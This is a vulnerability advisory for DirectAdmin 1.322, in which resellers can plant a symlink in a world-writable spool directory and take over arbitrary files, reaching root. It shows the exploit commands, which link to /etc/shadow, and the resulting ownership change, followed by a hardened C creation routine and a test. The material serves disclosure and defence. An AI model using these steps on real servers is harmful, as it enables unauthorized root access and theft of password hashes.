DirectAdmin 1.322 - resellers can take control of any file



DESCRIPTION


The /var/spool/virtual directory was given permissions of 0777, allowing anyone with access to the box to write to that location. When a new account was created in DirectAdmin, the name of the domain for the newly created account was written there as a directory. DirectAdmin failed to drop privileges from root when performing this task, so a reseller could first create a symbolic link, named after the domain, pointing to any location on the filesystem. When the new account was then created, the reseller would have full access to the resource being linked to.



IMPACT


Resellers could obtain full root privileges.


[user@host ~]$ cd /var/spool/virtual
[user@host /var/spool/virtual]$ ln -s /etc/shadow example.com


Next, the reseller logs in to DirectAdmin and creates a new account for the domain "example.com". This is the result:

[user@host ~]$ ls -l /etc/shadow
-rwxrwx---  1 example mail 1076 Sep  3 02:49 /etc/shadow
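
For comparison, one way a root-run provisioning step can create the per-domain entry without following a link planted in a spool directory that other users can write to. This is an added example, not DirectAdmin's code; the function names are hypothetical, and the 0770 mode is an assumption taken from the listing above.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create spool/<domain> for uid:gid, never following a planted link; 0 or -1. */
int create_domain_dir(const char *spool, const char *domain, uid_t uid, gid_t gid)
{
    struct stat st;
    int fd = -1, rc = -1;
    if (!*domain || domain[0] == '.' || strchr(domain, '/'))
        return -1;                  /* accept a single path component only */
    int dirfd = open(spool, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    /* mkdirat() fails with EEXIST if any entry, a symlink included, has this name. */
    if (dirfd < 0 || mkdirat(dirfd, domain, 0700) != 0)
        goto out;
    /* O_NOFOLLOW rejects a link swapped in after mkdirat(); the owner check
     * rejects a directory another user substituted in the writable spool. */
    fd = openat(dirfd, domain, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0 || fstat(fd, &st) != 0 || st.st_uid != geteuid())
        goto out;
    /* Change owner and mode through the descriptor, never through the path. */
    if (fchown(fd, uid, gid) == 0 && fchmod(fd, 0770) == 0)
        rc = 0;
out:
    if (fd >= 0)
        close(fd);
    if (dirfd >= 0)
        close(dirfd);
    return rc;
}

/* Constructed check: 0777 dir with example.com -> target planted; expect refusal. */
int planted_link_is_refused(void)
{
    char dir[] = "/tmp/spoolXXXXXX";
    struct stat st;
    if (!mkdtemp(dir) || chmod(dir, 0777) != 0)
        return 0;
    int d = open(dir, O_RDONLY | O_DIRECTORY);
    int t = openat(d, "target", O_CREAT | O_WRONLY, 0600);
    if (t < 0 || fchmod(t, 0600) != 0 || symlinkat("target", d, "example.com") != 0)
        return 0;
    int refused = create_domain_dir(dir, "example.com", getuid(), getgid()) == -1;
    int created = create_domain_dir(dir, "example.org", getuid(), getgid()) == 0;
    return refused && created && fstat(t, &st) == 0 && (st.st_mode & 0777) == 0600;
}
```

Removing the 0777 mode from the spool directory takes away the precondition; the descriptor-based calls cover the case where the directory has to stay writable by others.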